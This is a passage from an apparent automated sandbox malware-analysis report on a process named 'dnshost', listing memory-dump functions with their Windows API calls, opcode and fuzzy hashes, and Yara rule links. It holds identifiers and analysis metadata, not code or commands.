Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0737E6B6

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c0f3fb05e601f3d62b5f1cf55d443df91d44205aa15e4616baa845799f3cbf7
Instruction ID: baf29ab8cc3d9cee333002b324498a904aad4fe68a9ccdaa342472139bf51f18
Opcode Fuzzy Hash: 3c0f3fb05e601f3d62b5f1cf55d443df91d44205aa15e4616baa845799f3cbf7
Instruction Fuzzy Hash: FF116A759002499FDB20DFA9C844BDEBFF5EF88320F148419E519A7250C779A540CFA0

Function 0737E648 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0737E6B6

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0812ee00a6729090b033b04cd7e3a9c6244990872a66d11b318be28432763895
Instruction ID: e333497c5d47ed08f2f938c25d3d50daf77dfbd0d0d401d7099da7e5ef00d729
Opcode Fuzzy Hash: 0812ee00a6729090b033b04cd7e3a9c6244990872a66d11b318be28432763895
Instruction Fuzzy Hash: BE114C759002499FDB20DFA9C844ADFBFF5EF48320F148419E519A7250C775A540DFA0

Function 0737DC48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0737DCB2

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3722dd6810ebbef92b9479c9e416f829f9ebfafe93c17495e46849b291e87f91
Instruction ID: 0b2106588d1661969e724d107553e17259b52399e89c1f203e0cb5fe58e81ff5
Opcode Fuzzy Hash: 3722dd6810ebbef92b9479c9e416f829f9ebfafe93c17495e46849b291e87f91
Instruction Fuzzy Hash: 83115BB1D043498BDB20DFAAC98479EFFF4EF88324F248419D559A7240CB79A545CB94

Function 0737DC50 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0737DCB2

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 185a6eddd27caf2032d3bde7334ba89dd847cc1d2dd89b9ff39aea1d6884e455
Instruction ID: a66b2aa2fa7254e5b6ca7a1d0aca4b2b19d951359a81350f6226c006b3a64698
Opcode Fuzzy Hash: 185a6eddd27caf2032d3bde7334ba89dd847cc1d2dd89b9ff39aea1d6884e455
Instruction Fuzzy Hash: 97116AB1D003498FDB20DFAAC94479EFBF4EF88320F148419D519A7240CB79A940CFA0

Function 016EB498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 016EB4FE

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9f3c81e2966d2e26d24b3e6873579effcba2262d7ec37126ddfcf6be69eb9174
Instruction ID: cbcfacbc6fcc0a3ea8b2fffe41643c158a08fd3855900ee820714da345edf24f
Opcode Fuzzy Hash: 9f3c81e2966d2e26d24b3e6873579effcba2262d7ec37126ddfcf6be69eb9174
Instruction Fuzzy Hash: 431102B6C007498FDB20CF9AC848A9EFBF4EB88314F14851AD518A7210D375A545CFA1

Function 07D12730 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07D12795

Memory Dump Source

Source File: 0000000F.00000002.2110905492.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7d10000_dnshost.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 65c70fa3c3ee72e0e20e9cae0cbd869c53a5eff6cd6f1ffdc9df5e605732975b
Instruction ID: 80430bbf948851e175716697456ba93cc18a79f8bc80321eab86031c7c9ced69
Opcode Fuzzy Hash: 65c70fa3c3ee72e0e20e9cae0cbd869c53a5eff6cd6f1ffdc9df5e605732975b
Instruction Fuzzy Hash: DE11E3B59006499FDB10CF99D984BDEFBF4EB48320F14881AE554A7200D375A544CFA1

Function 07D1005C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07D12795

Memory Dump Source

Source File: 0000000F.00000002.2110905492.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7d10000_dnshost.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4c27600393c50b2f7aef3c67243cbbf2f448a266d995d9cd367caadbbb938954
Instruction ID: 0c2c5b4f38f3b5fce5033157301b3726093768177583566d5b655c6e7d3634f3
Opcode Fuzzy Hash: 4c27600393c50b2f7aef3c67243cbbf2f448a266d995d9cd367caadbbb938954
Instruction Fuzzy Hash: 9011E3B59043499FDB20DF99D984BDEFBF8FB58320F108459E558A7200D375A944CFA1

Function 073EE7B0 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

PHeq, xrefs: 073EE981

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 430f696398b49e1c7681f2b8ea9f910e2a1c98243926e9c647cc578e576ddb01
Instruction ID: cc2ef7af7106922cf76fecfe48e5d5245e7e83a120ffa268272b93d25f9e9f99
Opcode Fuzzy Hash: 430f696398b49e1c7681f2b8ea9f910e2a1c98243926e9c647cc578e576ddb01
Instruction Fuzzy Hash: A9517C70640212CFEB59CF64C898B99BBF9FF49704F1481A9E449DB2A1CB34EC45CB50

Function 073EE7D0 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

PHeq, xrefs: 073EE981

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 5b512e94fc7d0cbd84d2d454fdd82410f3770bef85359c5413743f9127627cf6
Instruction ID: ab71b33fa12c235238b4aadf77e441e526ede9a202040ffa8c30762964c8ca86
Opcode Fuzzy Hash: 5b512e94fc7d0cbd84d2d454fdd82410f3770bef85359c5413743f9127627cf6
Instruction Fuzzy Hash: 895145B0640516CFEB58CF64C898BA9B7F9BF48704F148169E41ADB3A1CB30EC45CB90

Function 073EE9AC Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(iq, xrefs: 073EE9AD

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: 9970cf47f790cf1e3538148b913b72ea5f72164fc23a55cdd4bcd57e81609adb
Instruction ID: 3cea90c4f595bd75420fd219fdc4b1213c0ccd73535284e5b6403d2dc91386b0
Opcode Fuzzy Hash: 9970cf47f790cf1e3538148b913b72ea5f72164fc23a55cdd4bcd57e81609adb
Instruction Fuzzy Hash: DC417F702406118FE765DB38D448B5A77AABF85321F55856DE05ECB3E1CF74E88ACB40

Function 073E54C0 Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

4'eq, xrefs: 073E5519

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: de3e293c4f480e3b021fe097e1c28c1fb16bb338cf4051a25aa83160c920c1c7
Instruction ID: 038aca6f778b6dbb18f8a07d1d235419646d15e3880fcb4d526ecfbbaf7f7f3f
Opcode Fuzzy Hash: de3e293c4f480e3b021fe097e1c28c1fb16bb338cf4051a25aa83160c920c1c7
Instruction Fuzzy Hash: 61116D70A00209DFCB45EF78FA196ED7FB1FF09201F1141AAD445DB296EA349E498B61

Function 073E54E8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4'eq, xrefs: 073E5519

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: 447ca44b2b4ce1284b4e245b23aae4d64564614f5df320ac39ca2c6aef3edfa5
Instruction ID: b45bfe314f21bb1c32ebf51a39b81d1e8e7b180f50102a1c5310cbe9b1440c5c
Opcode Fuzzy Hash: 447ca44b2b4ce1284b4e245b23aae4d64564614f5df320ac39ca2c6aef3edfa5
Instruction Fuzzy Hash: 32F03770A10209EFCB48EFB8F6485AD7FF1FF48206B6045A9D805D7255EA306E898B60

Function 073E6CD8 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad035b50fa02716d2780c338613245690fae6c24c0b82a2d02a1ba269983afe6
Instruction ID: d11aede0a758d91d6f7154f777a9c1e2a40e49254af20e656c3c7bce2f8b9967
Opcode Fuzzy Hash: ad035b50fa02716d2780c338613245690fae6c24c0b82a2d02a1ba269983afe6
Instruction Fuzzy Hash: D5D1E6B4A00215CFEB15CF58C588B9DB7F6FF84315F6585A9E4099B2A2CB31ED86CB40

Function 073E3528 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c9d1a9b15060ee795369c11056378bff67c128f46e7c8f5b4df600bdc05d48d
Instruction ID: c4232fa4285a054a3411fa03d5202772a90b6542a6ff607593be5440eccd1fc7
Opcode Fuzzy Hash: 2c9d1a9b15060ee795369c11056378bff67c128f46e7c8f5b4df600bdc05d48d
Instruction Fuzzy Hash: 5D518CB07106158FDB15EB68C894BAABBFAEF89304F15416DE50ADB3A1CB71EC41CB50

Function 073E3518 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e74159972089e9c92b98ab1b0ef8fe10ef1a86c0974f5a5f4e8fa0870ca4340c
Instruction ID: 39c8c6d2cd40fc3bf8d8ae2794267bda850b6d874d3fd545f583cad710c9fd09
Opcode Fuzzy Hash: e74159972089e9c92b98ab1b0ef8fe10ef1a86c0974f5a5f4e8fa0870ca4340c
Instruction Fuzzy Hash: 0E418BB0710215DFDB15EB68C888BAABBFAEF89300F55416DE0099B3A1CB31EC45CB50

Function 073E5DE8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dcbb4537ac62d8b44a71dc6b3d72bc6c56afbd4089634d030bde4d0bb4637f3
Instruction ID: ecfbd7bc88c5640ae1cb432883cd371d96b07a96f9011f17e4040139a79c3afb
Opcode Fuzzy Hash: 0dcbb4537ac62d8b44a71dc6b3d72bc6c56afbd4089634d030bde4d0bb4637f3
Instruction Fuzzy Hash: DF4123B16016519FEB25DB28C804BBAB7D9EFC5305F04846ED40E87281CB74EC5ACB91

Function 073EC130 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24945c51514a78cbb97a296890a129b4a808250851526da4b1e9f1fb6d6c786f
Instruction ID: aeafd88c2d79641034b205a508df91182504c7c49fcf99daebe8f80a2063b67a
Opcode Fuzzy Hash: 24945c51514a78cbb97a296890a129b4a808250851526da4b1e9f1fb6d6c786f
Instruction Fuzzy Hash: 174196B0700615DFEB25DB64C884BBEB3BABF85310F145569E1498B3E1CB71AC46CBA1

Function 073EC140 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8d1eb4643b9298653dd281a58729a95bdb3965d84c2fd3159478ee788bd0fb9
Instruction ID: 9ecd8c85e02b0c81eff5dd3ac4244905503dab8aeb73a54d4ed267d4dd80da6d
Opcode Fuzzy Hash: a8d1eb4643b9298653dd281a58729a95bdb3965d84c2fd3159478ee788bd0fb9
Instruction Fuzzy Hash: 264176B0700615DFEB25DB64C984BBEB3BABF85310F105569E1498B3E1CB71AC46CBA1

Function 073E8A70 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fabd4941ae92e8fe96d5452a0b20c956895fc23e92804939670fb1ccc8ed681
Instruction ID: eca4bc07c5d81ccfe63e9680e307944fed720943e1c38b996606422f60ce3205
Opcode Fuzzy Hash: 9fabd4941ae92e8fe96d5452a0b20c956895fc23e92804939670fb1ccc8ed681
Instruction Fuzzy Hash: C03189B4711A118FD715EF38D44866EBBF6BF88210B14826CE00AC73A5EF38D806CB81

Function 073E8A80 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ad52c21741cc04243248177b003e81f801396bbb93f5436ea7a50518fc351c
Instruction ID: 9f808d9a0489701d5a585b9be7a26efaea7821b3c0160b315ca1fba57cfe0d6a
Opcode Fuzzy Hash: a2ad52c21741cc04243248177b003e81f801396bbb93f5436ea7a50518fc351c
Instruction Fuzzy Hash: F5316DB4710A118FD715EF38D45866E7BE6FF89211B14866DE00AC73A5EF38D806CB85

Function 073ECCE0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef857bbf89483b4eca36d94995be7008c846b7e7c55e3dcb467964faa6622853
Instruction ID: 1e59c880ec07ff5d48e45dc363ebd55b9aba12f84ca82d3d2d462c166a4bdfc9
Opcode Fuzzy Hash: ef857bbf89483b4eca36d94995be7008c846b7e7c55e3dcb467964faa6622853
Instruction Fuzzy Hash: BE313EB53206218FEB15DB29C484B6A77EAFF85714F1584A9E40ACB3A1DE32EC41CB50

Function 073EFD38 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1675be87a335b70c999deb2fa28f413ba59db75a61aeeb339ca2ed11e7d39335
Instruction ID: da3574508f371bb130e5d8dd29cba00cb49a535c52234cd7fb1632f762009cf9
Opcode Fuzzy Hash: 1675be87a335b70c999deb2fa28f413ba59db75a61aeeb339ca2ed11e7d39335
Instruction Fuzzy Hash: D3314971700226DFDB54DF68C884AAE7BB6FF88620F114269E5298B2F1C7B0DD41CB90

Function 073EFD48 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00eb04ef15fcdd4e6c44af8e8a4f4a94f9019391ce9a0d7d9c5c0f34d54d1212
Instruction ID: c80b3419b65626d587efdf273aa46423d3e10bc8107f05671087bccd573e4e1e
Opcode Fuzzy Hash: 00eb04ef15fcdd4e6c44af8e8a4f4a94f9019391ce9a0d7d9c5c0f34d54d1212
Instruction Fuzzy Hash: 6C315C717002169FDB54DF68C844AAE7BB6FF88620F104259E5158B3F1CB70DC01CB90

Function 073ED2C0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4044ca3ae4d7605d4571fe590f3d0cb03f8baf6528347fe2f23ccb969953ca9f
Instruction ID: 8d279649ddc1fbca77c4eb643de879c23510466f0ca215377c3b81a46e09e020
Opcode Fuzzy Hash: 4044ca3ae4d7605d4571fe590f3d0cb03f8baf6528347fe2f23ccb969953ca9f
Instruction Fuzzy Hash: AD310DB53106118FEB14DB29C484FAA77FAFF84714F1585A9E44ACB3A1DA32EC41CB50

Function 073E7ED8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe9b65768d7f842f407c7d45ec9f0cbd814af93f07aae2cf8bde0fdbbfc8990
Instruction ID: dc592c6061f3607f780f60647a5637e3a02fbc61ace42b9cb2a014e0ec9a0495
Opcode Fuzzy Hash: 9fe9b65768d7f842f407c7d45ec9f0cbd814af93f07aae2cf8bde0fdbbfc8990
Instruction Fuzzy Hash: 13319FB43226158FDB15EB2AD44897EBBEAEFC96113048169E40AC77A5DF34DC02CB91

Function 073E6589 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9fb63511ccfe3777eddd6184c7cf8f824104500ce87ade2cff907d55d9e8a6
Instruction ID: 0c508a0f985b55e50df5a5d7efe7f5897339995d49ce4fc2aec72dec7045f09b
Opcode Fuzzy Hash: 1e9fb63511ccfe3777eddd6184c7cf8f824104500ce87ade2cff907d55d9e8a6
Instruction Fuzzy Hash: 103115B5A00614CFD718DF68C484A99BBF6FF8C720F5584A9D409AB3A1DB31EC46CB21

Function 073E3864 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173a6e3516be0f3667dcb041614b45acf8c82469478810f6d61b6147d5981d35
Instruction ID: a6906020920d3df1aaf9a51f648c33222c035df4bb8dbea8012f6bc747dc8fc7
Opcode Fuzzy Hash: 173a6e3516be0f3667dcb041614b45acf8c82469478810f6d61b6147d5981d35
Instruction Fuzzy Hash: 85311978A21229DFDB04DFA8D894DECB7B9FF8C700B1185A9E905AB360C730A840CB50

Function 073E4528 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f34920df69afdb6b3b6a515bd8e06d539faaacdcb25089703ef9ebfe25d8d5
Instruction ID: cc993e9f6c6704ed8a659c1c4d060a9be70907acb6bbde855ecb412231d997f1
Opcode Fuzzy Hash: 84f34920df69afdb6b3b6a515bd8e06d539faaacdcb25089703ef9ebfe25d8d5
Instruction Fuzzy Hash: 2E21B2B57102618FDB14DB6DE44496E73EAEF8962171140AAE909CB3E1EF31DC01CBA0

Function 073E7EC8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fefae1da7139fc41b326c57353576cbdfac04e87da5f39417c3039fd4daf478
Instruction ID: 773eb14511dccbba0a7a4c8843d65bd13a10108e3fcdf0b5b0ec1864c7ee62ed
Opcode Fuzzy Hash: 1fefae1da7139fc41b326c57353576cbdfac04e87da5f39417c3039fd4daf478
Instruction Fuzzy Hash: 6A315EB4322611CFDB15AB29D45897DBBFAFF8961170481A9E40AC77A5DF38DC02CB81

Function 073ECFC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbaa0d48384af61787588783b5ed69290de58006edf02ddb8836c0abdc0cfb4a
Instruction ID: 36dd38de12e97cc4ece2f1f88336b0def714eb3f76f2f00ee4af6566f9131f9c
Opcode Fuzzy Hash: bbaa0d48384af61787588783b5ed69290de58006edf02ddb8836c0abdc0cfb4a
Instruction Fuzzy Hash: 8B315C70240611CFE764DB28D848B6677A9FF84325F51CA6DE05E8B2E1CF70E88ACB40

Function 073EDBB8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a98c30b61d4c8b5b6846ae5b4b7de3bb5d465b0aed50c56069bcec697c1b1e
Instruction ID: 4eb61e056200c340dc17a560950ba130bc4af125acee8e51dcb02a442107ba45
Opcode Fuzzy Hash: 94a98c30b61d4c8b5b6846ae5b4b7de3bb5d465b0aed50c56069bcec697c1b1e
Instruction Fuzzy Hash: 48218EF473152A8BAB1A673D841423E36DF9FC4581708002AD90ACB3D8EF79CC8287D2

Function 073ED875 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb9a6a66daeabfa00f161bd38521c94f60cd689c1485b5a575a971ed9500c77
Instruction ID: 6cf1ba117ca77592baa524027f6e14a967959feef31993aef85de6a43d7eb9cc
Opcode Fuzzy Hash: 1bb9a6a66daeabfa00f161bd38521c94f60cd689c1485b5a575a971ed9500c77
Instruction Fuzzy Hash: 9B3118B5B10219CFEB18DF64C944AAD77F6EF88311F144068E809AB294DB31EC81CB61

Function 012ED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072882035.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12ed000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80bea8552a04dfb3b74566c113649e51c93389e30f1f00259883d665bca042f
Instruction ID: 209529ded75a7204216198aa2310f8540cdaf4bc49da744301a91454bb8d18cb
Opcode Fuzzy Hash: c80bea8552a04dfb3b74566c113649e51c93389e30f1f00259883d665bca042f
Instruction Fuzzy Hash: 1B216772514208DFCB02DF58E9C8B26BFA5FB88328F60C56DE9090B247C336D406CBA1

Function 012ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072882035.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12ed000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2031ea687fbab69e74d8f403225bcb971e9026f68805bf3ec7b3392d39ec416d
Instruction ID: 4acbd42ae255c0451640104d4b77459c06c459cc2cc5a5fd13df9797a507182d
Opcode Fuzzy Hash: 2031ea687fbab69e74d8f403225bcb971e9026f68805bf3ec7b3392d39ec416d
Instruction Fuzzy Hash: 2E214875114208DFDB02DF88C9C8B56BFA5FBA8324F60C56CE9090B246C336E406CAA1

Function 073ECD24 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e870d51ca39e63a83288bc1bca19d20354abec165e748549f14fbc0d06d361
Instruction ID: 47123a7c6cf017b8fd1a9207f358a2d78e83ce4cb6877e0411941b8ba717c739
Opcode Fuzzy Hash: e7e870d51ca39e63a83288bc1bca19d20354abec165e748549f14fbc0d06d361
Instruction Fuzzy Hash: A4314A703106118FD755DB28D898BA677E9FF85315F5188A9E05ECB3A1CF70AC8ACB40

Function 012FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2072951474.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_12fd000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5accc65b23699d133346d5bc06e54cf46386f154489552b99987969f514f9156
Instruction ID: 4f3f5a4e7392a92df3b7cb49b0e969426ec343402932512b7de345c6154dd432
Opcode Fuzzy Hash: 5accc65b23699d133346d5bc06e54cf46386f154489552b99987969f514f9156
